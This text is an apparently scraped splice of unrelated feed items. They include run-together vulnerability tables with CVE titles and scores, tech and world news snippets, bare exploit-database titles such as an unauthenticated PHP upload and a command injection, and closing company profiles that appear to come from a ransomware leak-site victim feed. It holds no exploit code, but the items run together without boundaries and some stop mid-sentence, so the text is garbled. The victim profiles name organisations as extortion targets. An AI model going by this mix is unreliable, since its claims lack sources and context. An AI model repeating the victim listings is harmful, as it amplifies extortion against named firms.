net/mailn/aNo7.5CVE-2026-42501Malicious module proxy can bypass checksum database in cmd/gon/aNo7.5CVE-2026-33079Mistune ReDoS in LINK_TITLE_RE allows denial of service with crafted Markdown titlesn/aNoCVE-2026-41889pgx: SQL Injection via placeholder confusion with dollar quoted string literalsn/aNoCVE-2026-42257net-imap: Command Injection via "raw" arguments to multiple commandsn/aNoCVE-2026-42258net-imap: Command Injection via unvalidated Symbol inputsn/aNoCVE-2026-42256net-imap: Denial of service via high iteration count for `SCRAM-*` authenticationn/aNoCVE-2026-42246net-imap vulnerable to STARTTLS stripping via invalid response timingn/aNoCVE-2026-45186n/aNo2.9CVE-2026-7261SoapServer session-persisted object use-after-free via SOAP header faultn/aNoCVE-2026-7258Out-of-bounds read in urldecode() on NetBSDn/aNoCVE-2026-6722Use-After-Free in SOAP using Apache mapn/aNoCVE-2026-6735XSS within PHP-FPM status endpointn/aNoCVE-2026-7262NULL pointer dereference in SOAP apache:Map decoder with missing n/aNoCVE-2025-14179SQL injection in pdo_firebird via NUL bytes in quoted stringsn/aNoCVE-2026-7568Signed integer overflow in metaphone()n/aNoCVE-2026-7259Null pointer dereference in php_mb_check_encoding() via mb_ereg_search_init()n/aNoCVE-2026-43500rxrpc: Also unshare DATA/RESPONSE packets when paged frags are presentn/aNo7.8SQL Server vulnerabilitiesCVETitleExploitation statusPublicly disclosed?CVSS v3 base scoreCVE-2026-40370SQL Server Remote Code Execution VulnerabilityExploitation Less LikelyNo8.8Windows vulnerabilitiesCVETitleExploitation statusPublicly disclosed?CVSS v3 base scoreCVE-2025-54518AMD: CVE-2025-54518 CPU OP Cache CorruptionExploitation UnlikelyNoCVE-2026-41095Data Deduplication Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-35424Internet Key Exchange (IKE) Protocol Denial of Service VulnerabilityExploitation UnlikelyNo7.5CVE-2026-40377Microsoft Cryptographic Services Elevation of Privilege VulnerabilityExploitation Less 
LikelyNo7.8CVE-2026-34329Microsoft Message Queuing (MSMQ) Remote Code Execution VulnerabilityExploitation Less LikelyNo8.8CVE-2026-41097Secure Boot Security Feature Bypass VulnerabilityExploitation Less LikelyNo6.7CVE-2026-33839Win32k Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.0CVE-2026-33840Win32k Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-34330Win32k Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.8CVE-2026-34331Win32k Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.0CVE-2026-35423Windows 11 Telnet Client Information Disclosure VulnerabilityExploitation UnlikelyNo5.4CVE-2026-35438Windows Admin Center Elevation of Privilege VulnerabilityExploitation Less LikelyNo8.3CVE-2026-34344Windows Ancillary Function Driver for WinSock Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-34345Windows Ancillary Function Driver for WinSock Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.0CVE-2026-35416Windows Ancillary Function Driver for WinSock Elevation of Privilege VulnerabilityExploitation More LikelyNo7.0CVE-2026-41088Windows Ancillary Function Driver for WinSock Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.8CVE-2026-34343Windows Application Identity (AppID) Subsystem Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-35418Windows Cloud Files Mini Filter Driver Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.8CVE-2026-33835Windows Cloud Files Mini Filter Driver Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-34337Windows Cloud Files Mini Filter Driver Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-40407Windows Common Log File System Driver Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.8CVE-2026-40397Windows Common Log File System Driver Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-41096Windows DNS Client Remote Code 
Execution VulnerabilityExploitation UnlikelyNo9.8CVE-2026-42896Windows DWM Core Library Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-35419Windows DWM Core Library Information Disclosure VulnerabilityExploitation Less LikelyNo5.5CVE-2026-34336Windows DWM Core Library Information Disclosure VulnerabilityExploitation UnlikelyNo7.8CVE-2026-33834Windows Event Logging Service Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-32209Windows Filtering Platform (WFP) Security Feature Bypass VulnerabilityExploitation UnlikelyNo4.4CVE-2026-35421Windows GDI Remote Code Execution VulnerabilityExploitation UnlikelyNo7.8CVE-2026-40403Windows Graphics Component Remote Code Execution VulnerabilityExploitation Less LikelyNo8.8CVE-2026-40402Windows Hyper-V Elevation of Privilege VulnerabilityExploitation Less LikelyNo9.3CVE-2026-33841Windows Kernel Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-35420Windows Kernel Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-40369Windows Kernel Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-34332Windows Kernel-Mode Driver Remote Code Execution VulnerabilityExploitation UnlikelyNo8.0CVE-2026-34339Windows Lightweight Directory Access Protocol (LDAP) Denial of Service VulnerabilityExploitation Less LikelyNo5.5CVE-2026-34341Windows Link-Layer Discovery Protocol (LLDP) Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.0CVE-2026-33838Windows Message Queuing (MSMQ) Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-32161Windows Native WiFi Miniport Driver Remote Code Execution VulnerabilityExploitation Less LikelyNo7.5CVE-2026-41089Windows Netlogon Remote Code Execution VulnerabilityExploitation Less LikelyNo9.8CVE-2026-34342Windows Print Spooler Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.0CVE-2026-34340Windows Projected File System Elevation of Privilege 
VulnerabilityExploitation Less LikelyNo7.0CVE-2026-40398Windows Remote Desktop Services Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-21530Windows Rich Text Edit Elevation of Privilege VulnerabilityExploitation Less LikelyNo6.7CVE-2026-32170Windows Rich Text Edit Elevation of Privilege VulnerabilityExploitation Less LikelyNo6.7CVE-2026-40410Windows SMB Client Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.0CVE-2026-35415Windows Storage Spaces Controller Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-34350Windows Storport Miniport Driver Denial of Service VulnerabilityExploitation UnlikelyNo6.5CVE-2026-40405Windows TCP/IP Denial of Service VulnerabilityExploitation Less LikelyNo7.5CVE-2026-40414Windows TCP/IP Denial of Service VulnerabilityExploitation UnlikelyNo7.4CVE-2026-40401Windows TCP/IP Denial of Service VulnerabilityExploitation UnlikelyNo7.1CVE-2026-40413Windows TCP/IP Denial of Service VulnerabilityExploitation Less LikelyNo7.4CVE-2026-35422Windows TCP/IP Driver Security Feature Bypass VulnerabilityExploitation UnlikelyNo6.5CVE-2026-34351Windows TCP/IP Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-40399Windows TCP/IP Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-34334Windows TCP/IP Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.8CVE-2026-40406Windows TCP/IP Information Disclosure VulnerabilityExploitation Less LikelyNo7.5CVE-2026-33837Windows TCP/IP Local Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-40415Windows TCP/IP Remote Code Execution VulnerabilityExploitation UnlikelyNo8.1CVE-2026-42825Windows Telephony Service Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.0CVE-2026-34338Windows Telephony Service Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-40382Windows Telephony Service Elevation of Privilege VulnerabilityExploitation Less 
LikelyNo7.8CVE-2026-40380Windows Volume Manager Extension Driver Remote Code Execution VulnerabilityExploitation Less LikelyNo6.2CVE-2026-40408Windows WAN ARP Driver Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-34333Windows Win32k Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-34347Windows Win32k Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.0CVE-2026-35417Windows Win32k Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8Critical RCEs and EoPsCVETitleExploitation statusPublicly disclosed?CVSS v3 base scoreCVE-2026-33109Azure Managed Instance for Apache Cassandra Remote Code Execution VulnerabilityN/ANo9.9CVE-2026-33844Azure Managed Instance for Apache Cassandra Remote Code Execution VulnerabilityN/ANo9.0CVE-2026-42823Azure Logic Apps Elevation of Privilege VulnerabilityExploitation Less LikelyNo9.9CVE-2026-42898Microsoft Dynamics 365 On-Premises Remote Code Execution VulnerabilityExploitation UnlikelyNo9.9CVE-2026-42833Microsoft Dynamics 365 On-Premises Remote Code Execution VulnerabilityExploitation Less LikelyNo9.1CVE-2026-41103Microsoft SSO Plugin for Jira & Confluence Elevation of Privilege VulnerabilityExploitation More LikelyNo9.1CVE-2026-41096Windows DNS Client Remote Code Execution VulnerabilityExploitation UnlikelyNo9.8CVE-2026-40402Windows Hyper-V Elevation of Privilege VulnerabilityExploitation Less LikelyNo9.3CVE-2026-41089Windows Netlogon Remote Code Execution VulnerabilityExploitation Less LikelyNo9.8
The man smashed into a car and stole luggage containing hard drives with the singer's tracks.
Google today announced a new series of Googlebook laptops that will be built with Gemini at the core. Googlebooks will run software built on a foundation that combines Android and ChromeOS. Google says the new laptops are designed for Gemini Intelligence for a more personalized and proactive experience. Instead of a cursor, Googlebooks have a Magic Pointer that users can wiggle to activate Gemini. Gemini can then provide contextual suggestions and answers based on whatever the user is pointing to on the screen. Pointing at a date in an email sets up a meeting, and selecting two images allows them to be visualized together. There are ask, compare, and combine tools available with the Magic Pointer. Create My Widget, a new Android feature, is coming to Googlebooks. Users can create custom widgets with a Gemini prompt. Gemini is able to search the internet and connect with Google apps like Gmail and Calendar to create a personalized dashboard that can be used for widget creation. Since Googlebooks will run Android, it will be easier to switch between a Googlebook and an Android smartphone. Apps from a connected Android smartphone will be available on the Googlebook, with a feature set similar to Apple's iPhone Mirroring. Quick Access will let users view, search, or insert files from a smartphone on the laptop, with no transfer needed. Google says it is working with Acer, ASUS, Dell, HP, and Lenovo to make the first Googlebooks. The machines will be built with "premium craftsmanship and materials, coming in a variety of shapes and sizes." Each one will have a "glowbar" on the lid, making it clear that it's a Googlebook. Google has not given insight into Googlebook pricing, but with the specific "premium" build language, they could be priced above the low-cost MacBook Neo that Apple recently came out with.
It's also possible that Googlebooks will have MacBook Neo-level pricing to better compete with Apple's laptop on pricing and build quality. The first Googlebooks are set to launch this fall. Tags: Android, Google. This article, "Google Unveils Googlebook, a New AI Laptop Built Around Gemini," first appeared on MacRumors.com.
Voister has covered Sweden's IT development since 2016. After ten years, we are now setting our sights on the next chapter, which begins with a new name: CIO Analytics.
With an aging population and large percentage of adults who grew up as only children, families are finding themselves at a loss for how to choose adequate nursing homes. Enter senior care managers.
Customers with addresses in the neighborhood, known for its livestreaming community, reported being unable to order items from various luxury brands online for several days.
Ninja Forms Uploads - Unauthenticated PHP File Upload
glances 4.5.2 - command injection
coreruleset 4.21.0 - Firewall Bypass
Flowise < 3.0.5 - Missing Authentication for Critical Function
The good news: no 0-days. The bad news: busy week ahead for Microsoft admins
Popular Mac menu bar management app Bartender received an upgrade today with the launch of Bartender Pro. Bartender Pro adds a new Top Shelf feature to the Mac's notch, with access to multiple utility tools. Top Shelf can be used for clipboard access, storing files, controlling audio, and sending content over AirDrop. It supports widgets for calendar, weather, and music apps like Apple Music or Spotify. There's a full Now Playing music controller, and options to get alerts when scheduled events are coming up. Top Shelf expands the size of the notch, turning it into something like the iPhone's Dynamic Island. Users can drag files over to the notch to store them or send them via AirDrop, and access a clipboard. The clipboard can be set to automatically capture content that's copied, with options to ignore passwords. There are customizable duration options for both the clipboard and file storage. Widgets in Top Shelf are customizable, and it supports a Live Activity-like tracking feature for AI agents like Codex and Claude Code. Info like volume, display brightness, and battery level is also available. Top Shelf works alongside Bartender, and all of the standard Bartender features are available with Bartender Pro. When not in use, Top Shelf is tucked away much like Bartender, and it disappears when Bartender is expanded. While it is a tool designed around the notch, it also works on Macs that don't have one. Bartender Pro is optional, and users who don't need the extra features can stick with Bartender 6. Bartender Pro is priced at $15 per year. The subscription includes Bartender 6, all future upgrades for the subscription duration, and the Bartender Pro suite. Bartender 6 is still available for a one-time $20 purchase, and the $80 Mega Supporter option continues to offer lifetime Bartender access with Bartender Pro included.
Bartender Pro and Bartender 6 are available from the Bartender website. Tag: Bartender. This article, "Bartender Pro Brings Widgets, Clipboard, and File Storage to the MacBook Notch," first appeared on MacRumors.com.
The United States announced on Tuesday that it would send a delegation to the second Asia-Pacific Economic Cooperation (Apec) 2026 Senior Officials’ Meeting (SOM2) and related meetings in China this month, just hours after US President Donald Trump departed for Beijing ahead of a high-stakes summit with Chinese counterpart Xi Jinping. The US delegation will head to Shanghai and Suzhou from May 11 to 24 to “continue advancing ‘America first’ foreign, trade, and investment policies,” according to...
The lilacs are in bloom and the Eurovision Song Contest is back in Central Europe. Sweden is through to the final. So is the hot favourite Finland, but only one entry can go all the way – and tonight it became clear which one it is.
Article URL: https://www.bbc.com/culture/article/20260511-kraftwerks-radical-1976-track-radioactivity-became-an-anti-nuclear-anthem Comments URL: https://news.ycombinator.com/item?id=48115823 Points: 220 # Comments: 190
Article URL: https://www.savethearchive.com/newsleaders/ Comments URL: https://news.ycombinator.com/item?id=48115807 Points: 389 # Comments: 108
The U.S. House Committee on Homeland Security is calling on Instructure executives to testify about two cyberattacks by the ShinyHunters extortion group that targeted the company's Canvas platform, allowing threat actors to steal student data and disrupt schools during final exams. [...]
'What the hell is going on? It's just draining my money'
South Korea's presidential policy chief is calling for a "citizen dividend" that would return some AI-driven profits and tax revenue to the public. The Straits Times. From the report: Presidential policy chief Kim Yong-beom said in a Facebook post that a portion of the profits and tax revenue derived from the artificial intelligence boom "should be structurally returned to all citizens." That is because, Mr Kim argued, the economic gains from AI are based at least partly on industrial infrastructure built by the country over five decades. Mr Kim's comments come after tens of thousands of people gathered outside Samsung's main chip hub in April to demand employees get a greater share of AI profits. The company's labour union wants 15 per cent of operating profit handed to chip-division employees. The union has threatened an 18-day strike starting May 21. Workers have pointed to rising payouts at SK Hynix, which in 2025 agreed to allocate 10 per cent of its annual operating profit to a performance bonus pool, as evidence they deserve more pay. "Excess profits in the AI era are, by nature, concentrated," Mr Kim wrote. Memory companies, core engineers and asset holders are highly likely to receive substantial benefits, while much of the middle class may experience only indirect effects. Read more of this story at Slashdot.
For those making use of OpenZFS on Linux or FreeBSD, OpenZFS 2.4.2 is out today as the newest stable release of this ZFS file-system implementation...
Article URL: https://arstechnica.com/tech-policy/2026/05/drop-database-what-not-to-do-after-losing-an-it-job/ Comments URL: https://news.ycombinator.com/item?id=48115438 Points: 68 # Comments: 23
Founded in 1846, Porter Wright is a full-service law firm offering legal help for the community specia…
They offered $100,000 to keep the data from being published. Founded in 1962 and headquartered in Phil…
Air India faces a leadership vacuum and mounting financial losses as it struggles to recover from the crash.
Beijing is arguably the most powerful competitor the US has confronted in its history, one analyst says.
Affected factories back up and running, we're told
Instructure, the company behind the widely used Canvas learning platform, says it reached an agreement with the hackers who stole 3.5 terabytes of student and university data. The company says it received "digital confirmation" that the information was destroyed and that affected schools and students would not be extorted. The BBC reports: Paying cyber criminals goes against the advice of law enforcement agencies around the world, as it can fuel further attacks and offers no guarantee the data has been deleted. In previous cases, criminals have accepted ransom payments but lied about destroying stolen data, instead keeping it for resale. For example, when the notorious LockBit ransomware group was hacked by the National Crime Agency, police found stolen data had not been deleted even after payments had been made. Instructure said in a statement on its website that protecting students' and education staff data was its primary motivation. "While there is never complete certainty when dealing with cyber criminals, we believe it was important to take every step within our control to give customers additional peace of mind, to the extent possible," the company said. Instructure did not set out the terms of the agreement but said that it meant that: - the data was returned to the company - it received "digital confirmation of data destruction" - it had been informed that no Instructure customers would be extorted as a result of the incident - the agreement covers all affected customers, with no need for individuals to engage with the hackers
The plan aims to speed up AI compute deployment while compensating residents.
Article URL: https://github.com/FULU-Foundation/OrcaSlicer-bambulab Comments URL: https://news.ycombinator.com/item?id=48115127 Points: 619 # Comments: 279
Artificial intelligence platforms may be just as susceptible to social engineering as human beings, but they are proving remarkably good at finding security vulnerabilities in human-made computer code. That reality is on full display this month with some of the more widely-used software makers -- including Apple, Google, Microsoft, Mozilla and Oracle -- fixing near record volumes of security bugs, and/or quickening the tempo of their patch releases.
Against the backdrop of a shifting diplomatic landscape, US President Donald Trump is set to arrive in Beijing this week for a high-stakes summit. While Washington frames the visit, delayed by the war in Iran, as a pivotal effort to rebalance ties, the bravado of maximum pressure masks a deepening domestic vulnerability. Trump’s arrival comes at a critical juncture; his administration faces multiple crises. The looming 2026 midterms have intensified pressure from a restless agricultural...
Makary reportedly spent his year bucking Trump admin and making industry enemies.
FreeBSD 15.0 had aimed to provide a KDE desktop install option from its text-based OS installer to make for a more compelling FreeBSD out-of-the-box desktop experience. That was then delayed to FreeBSD 15.1 but that didn't end up materializing. Now the KDE desktop install option is diverted to FreeBSD 15.2...
If you're not a fan of having AI baked into your OS, look elsewhere
It's the first time in two years with no zero-days. But with 137 flaws to patch, including nine critical ones, admins still have plenty of work to do.
An anonymous reader quotes a report from the Financial Times (via Ars Technica): Amazon employees are using an internal AI tool to automate non-essential tasks in a bid to show managers they are using the technology more frequently. The Seattle-based group has started to widely deploy its in-house "MeshClaw" product in recent weeks, allowing employees to create AI agents that can connect to workplace software and carry out tasks on a user's behalf, according to three people familiar with the matter. Some employees said colleagues were using the software to automate additional, unnecessary AI activity to increase their consumption of tokens -- units of data processed by models. They said the move reflected pressure to adopt the technology after Amazon introduced targets for more than 80 percent of developers to use AI each week, and earlier this year began tracking AI token consumption on internal leader boards. "There is just so much pressure to use these tools," one Amazon employee told the FT. "Some people are just using MeshClaw to maximize their token usage." Amazon has told employees that the AI token statistics would not be used in performance evaluations. But several staff members said they believed managers were monitoring the data. "Managers are looking at it," said another current employee. "When they track usage it creates perverse incentives and some people are very competitive about it."
RSL Media expands machine-readable licensing rules to cover AI use of identities and creative works
Google today said it is introducing updated file sharing features that will make it easier for Android users to send files to iPhone users. Quick Share is already compatible with Apple's AirDrop feature on select Android devices, but Google says the feature will expand to Samsung, OPPO, OnePlus, Vivo, Xiaomi, and HONOR devices in 2026. On Android devices that are not compatible with AirDrop, Quick Share can be used to generate a QR code that can instantly share content with iOS devices via the cloud. The QR code sharing feature is rolling out to all Android devices starting today, and will be fully available within the next month. Google says it also plans to make Quick Share available in apps like WhatsApp in the near future. Google says that it also worked with Apple to make it easier to switch from an iPhone to an Android device, capabilities the two companies had to implement under Europe's Digital Markets Act. While Apple implemented the feature in iOS 26.3, Google says it will be coming to Samsung Galaxy and Google Pixel devices in 2026. The transfer process will allow eSIM, passwords, photos, messages, apps, contacts, and Home Screen layout to migrate wirelessly from an iPhone to an Android device. Google has also implemented similar tools for simplifying switching between an Android device and an iPhone. This article, "Google Makes It Easier to Share Files Between Android and iPhone" first appeared on MacRumors.com
US Defence Secretary Pete Hegseth has become the first American defence chief in decades to accompany a sitting president on a state visit to China, in a rare departure from long-established diplomatic practice. Hegseth boarded Air Force One bound for Beijing alongside US President Donald Trump on Tuesday afternoon, according to the White House. Trump is set to hold highly anticipated bilateral talks with Chinese President Xi Jinping on Thursday and Friday. A South China Morning Post tally shows...
Article URL: https://github.com/Genymobile/scrcpy/releases/tag/v4.0 Comments URL: https://news.ycombinator.com/item?id=48114356 Points: 335 # Comments: 50
Apple is introducing an overhauled version of Siri in iOS 27, evolving the personal assistant into a more capable chatbot and AI agent able to compete with ChatGPT, Claude, and Gemini. With Siri's transition, Apple will be making multiple Siri-related design changes in iOS 27, according to a new report from Bloomberg. Siri will largely live in the Dynamic Island in iOS 27, but there will also be a dedicated Siri app for the first time. When Siri is activated with the Siri wake word or through the iPhone's side button, a pill-shaped animation will be displayed in the Dynamic Island. When Siri is asked a question or given a task, there will be a transparent results card. Swiping on it will bring up a conversation mode that looks similar to an iMessage chat, and it will incorporate small cards for the weather, notes, upcoming appointments, and other information that's relevant to queries. Apple is also designing a full Siri app for Siri conversations. It will allow users to look back at prior chats, and begin new Siri chats. There is a grid of rectangles with summaries of past conversations that users can tap into, a search bar, and a "+" button for starting a new conversation. The app will support uploading images and documents, and users will be able to type to Siri or use voice input. Swiping down from the top center of the display in any app will activate a system-wide search interface, with a "Search or Ask" bar in the Dynamic Island for typing or speaking questions. Search or Ask is similar to Spotlight Search, but Bloomberg suggests it will display "more advanced results and additional data from within apps." Siri will be able to draw information from the web to provide detailed answers to the typical questions users ask chatbots. Siri's responses will include bullet points with information and large images.
While Siri is the default for the search bar, pressing on it will let users select other chatbots to speak with, such as ChatGPT or Gemini. Apple plans to let users choose third-party AI services as the default for Apple Intelligence features like Writing Tools and Image Playground, expanding Apple Intelligence integration beyond ChatGPT. Apple plans to overhaul the Image Playground app. The interface for generating a new image has fewer controls and a "describe a change" option for editing images that are created. Previously created images are displayed in a grid with more rounded edges, and instead of a New Image button, there's a "+" button. Apple has also been testing new models that produce more lifelike images, so we could see new image generation capabilities in iOS 27. Apple is also planning changes to the Camera app, Photos app, Wallet, and Shortcuts, plus there could be tweaks to Liquid Glass. More on what to expect from iOS 27 can be found in our iOS 27 roundup. This article, "iOS 27 Getting Major Siri Redesign With Chat Interface and Dedicated App" first appeared on MacRumors.com
Apple plans to make the Camera app more customizable in iOS 27, reports Bloomberg. Users will be able to select the features they want to see in the Camera app, like flash, exposure, timer, depth of field, photo styles, and resolution. Camera controls, labeled as widgets, will be able to be placed at the top of the Camera interface in any order. Users will be able to select widgets from a transparent widget tray that comes up from the bottom of the app. Widgets will be organized into categories that include basic, manual, and settings. Apple plans to use the same default layout that's available now with quick tap buttons for flash, Live Photos, and Night Mode, but the customizable interface will be added as a new advanced layout that will appeal to professional users. Different modes like photo and video will have their own sets of widgets, as will a new Siri camera mode that Apple plans to add to the app. Siri mode will incorporate the Visual Intelligence features that are currently accessible through the Camera Control or Action buttons. Right now, users can tap into a view with all of the Camera controls from the top right of the app, but that view is moving to the right of the shutter button. Apple will also add new grid and level options. In the Weather app, there will be a new Conditions panel for switching between temperature, rain, and wind. It will be the same as the interface that's available when tapping into one of the weather modules in the current version of the app. Apple plans to add an updated start page to Safari, and it will have four tabs across the top for swapping between favorites, bookmarks, Reading List, and history. There are system-wide design changes coming as well, according to Bloomberg. The tab bar in apps like Apple Music, Podcasts, News, and Apple TV will be adjusted to combine search with the other navigation options.
Apple separated search in many apps when introducing Liquid Glass, but it sounds like the company is going to revert to the prior unified design. When using the on-screen keyboard, there's a new animation that shows the keys sliding up from the bottom of the iPhone interface, plus Apple is adding redo and undo controls for fixing actions when customizing the Home Screen's icon and widget layouts. Apple is planning to preview iOS 27 at the Worldwide Developers Conference that begins on June 8. This article, "iOS 27 to Bring Customizable Camera App, Tweaks to Weather, Safari and Liquid Glass" first appeared on MacRumors.com
You have an IT budget? Must be nice. I am tasked with upgrading 3 Dell PowerEdge R430 servers that run a specific electronics part placement line software. Back in 2018 we purchased this absolutely horrible software and I worked with a project manager there to spec out the hardware. I was told at that time that *ahem* "7,200 RPM SATA drives should be okay as long as they are 2TB capacity." To run a MSSQL database. I don't know everything, but I'm pretty sure 7,200 RPM SATA drives for a database is not going to fly. I opted for SSDs but was told they were too expensive at the time by our GMs. We ended up finding 10k SAS drives and called it a day because I knew I wasn't going to win and hoped it would be okay. Since then, the guys I work with that interface with their software have been pissing and moaning about how long it takes to do anything. That's fine and dandy, I just reply that the project manager who specced the shit out OK'd this stuff. What's really annoying now however is that we've had this company here to troubleshoot some issues and the techs are also complaining about how slow these servers are. When I bring up that we followed so and so's project guide from their company and his recommended specs they look at me like I have two heads. Another great part is that the database is nowhere near close to using 2TB of storage. So now I'm tasked with upgrading these 3 servers, at a time where it couldn't possibly be any worse. Just looking at high-endurance SSDs and seeing the cost... I can already hear the GMs saying no. In short, are there any brands offering deals on 2.5" SSDs with at least 3 DWPD? I am planning to put them into some R640 servers with a PERC H730p. Any advice would be killer. submitted by /u/R4LRetro
The government hopes reforms will help young people enter the market, while critics say it will stifle supply.
The Information Commissioner's Office has fined South Staffordshire Water Plc and parent company South Staffordshire Plc £963,900 ($1.3 million) over a cyberattack that exposed the personal data of 663,887 customers and employees. [...]
Article URL: https://typesetinthefuture.com/2016/02/18/futuristic/ Comments URL: https://news.ycombinator.com/item?id=48113895 Points: 459 # Comments: 58
Beijing lashed out at Paraguay on Monday after President Santiago Pena wrapped up a four-day visit to Taiwan, branding Paraguayan leaders as willing “chess pieces” for independence forces on the self-ruled island that China claims as its own territory. Foreign ministry spokesman Guo Jiakun said China “firmly opposes and condemns” the trip and urged Asuncion to “change course at an early date” and recognise the one-China principle. “The wheels of history wait for no one. Rejecting the one-China...
Lebanon's health ministry says the paramedics were carrying out a rescue mission in Nabatieh in response to an earlier attack that killed one person.
Google is teasing a new line of "Googlebook" laptops for this fall, powered by a new Android-and-ChromeOS-derived operating system that will run Chrome, Android apps, phone-connected apps and files, and deeply integrated Gemini features. The company says Chromebooks will continue "after the launch of Googlebook" and "...all Chromebooks will continue to receive support through their device's existing date commitment." The Verge reports: "We'll have more to share on the exact OS branding later this year," Peter Du of Google's global communications team tells The Verge. [...] Googlebooks will have a Magic Pointer feature that offers contextual suggestions whenever you shake your cursor and point it at something on the screen. Google's examples include setting up a meeting by pointing at a date in an email or selecting images of furniture and a living space to visualize them together. Beyond your mouse pointer, Googlebooks will also feature the custom AI-created widgets that Google is also debuting today for Android phones and Wear OS smartwatches. I don't know what kind of horrors people will be able to make into widgets, but Google gives the example of making one to organize your flights, hotel information, restaurant reservations, and another for creating a countdown timer for an upcoming family reunion. (It's always flights, hotels, and restaurants, isn't it?) While there are many outstanding questions to be answered about Googlebooks, the biggest and most obvious ones are what will these laptops look like, what chips will be in them, and what will they cost? We've got none of that so far. Google only has some initial renders of a mysterious Googlebook and the promise that it's working with Acer, Asus, Dell, HP, and Lenovo to make the first models. There are no model names. No specs. Nada.
Google isn't even saying if the laptop in its renders is made by a partner or a tease of some first-party Pixel-like Googlebook to come or is just a cool mockup. The one distinct hardware feature shown, the bar of glowing Google-colored light, will be a signature of all Googlebooks. (Sure, bring on the RGB. Why not?)
IT teams often struggle to quickly coordinate responses across disparate systems during network incidents. This upcoming webinar explores how automation and AI-assisted workflows can reduce response times and help prevent outages. [...]
China’s foreign minister Wang Yi on Tuesday urged Pakistan to ramp up mediation efforts in the Iran crisis, as the war threatens to overshadow US President Donald Trump’s visit to Beijing. In a call with his Pakistani counterpart Ishaq Dar, Wang lauded Pakistan’s efforts in facilitating negotiations between Washington and Tehran and helping to extend the ceasefire. But he also called for Pakistan to “step up its mediation efforts to contribute to … the opening of the Strait of Hormuz and the...
Signal has introduced new in-app confirmations and warning messages as additional safeguards against phishing and social engineering attempts that could lead to various forms of fraud. [...]
The global hacker attack that hit several Swedish universities has been stopped. The hacker group threatened to leak enormous amounts of data. But now the attacked company has, according to information given to DN, entered into an agreement with the hacker group. "If it is the case that they have put themselves in a negotiating situation and paid a ransom to a criminal actor, then I want to point out that it rarely leads to anything good," says Eric Leijonram, Director General of IMY.
fdpme.com zoominfo.com/c/focus-design-partners/368873259 Focus Design Partners (fdpme.com) is a Grade-A international firm with nearly 50 years of excellence in architecture, engineering, and project management, delivering iconic projects like Qatar's Al Jannoub Stadium and Lusail Circuit. With offices across 6+ countries, they combine global expertise with strategic partnerships and a people-first culture certified by Great Place To Work®. Their integrated, sustainable design solutions span sports, healthcare, commercial, and infrastructure sectors — all delivered with full accountability and innovation
shajarpaksecurities.com Shajarpak Securities is a trusted SECP-licensed brokerage and part of the Shajarpak Group, empowering clients with secure online trading on the Pakistan Stock Exchange. Their seasoned equity team brings 60+ years of combined experience, delivering timely market insights and best-in-class execution with strict compliance and ethical standards. With a robust Oracle®-based platform, mobile apps, and dedicated support for NRPs and institutional investors, they make intelligent investing accessible anytime, anywhere
qnbn.qa zoominfo.com/c/qatar-national-broadband-network-qnbn/1121927707 Qatar National Broadband Network is a government-owned leader in passive fiber infrastructure, established in 2011 to power Qatar's digital transformation and National Vision 2030. With nationwide fiber-optic coverage, QNBN enables ultra-fast, secure connectivity for homes, businesses, and government through open access for all licensed service providers. Strategic partnerships with Microsoft and Carnegie Mellon Qatar underscore its commitment to innovation, AI readiness, and cyber-resilient infrastructure — all delivered with sustainability and future-ready excellence
electroban.com.py zoominfo.com/c/electroban-sae/372861276 Electroban is a leading 100% Paraguayan retail company founded in 2007, specializing in home appliances, electronics, furniture, and motorcycles. With nationwide coverage through numerous branches and home delivery, they serve over 100,000 customers with a certified e-commerce platform and reliable after-sales support. Backed by a team of 700+ employees and values like honesty and continuous learning, Electroban is expanding toward 70 stores to bring innovation and quality of life to families across Paraguay
orientaldiamond.jp Oriental Diamond Inc. is a pioneering Japanese diamond enterprise established in 1966, specializing in the import, design, and manufacturing of fine diamond jewelry and loose stones. As the first company in Japan to earn the prestigious Sightholder qualification, they combine global sourcing with in-house craftsmanship to deliver conflict-free diamonds and elegant collections like Hoshi no Suna. With a heritage of excellence and a diversified portfolio spanning jewelry, bridal, and traditional kimono wholesale, they continue to innovate as a trusted market leader in Tokyo's luxury sector
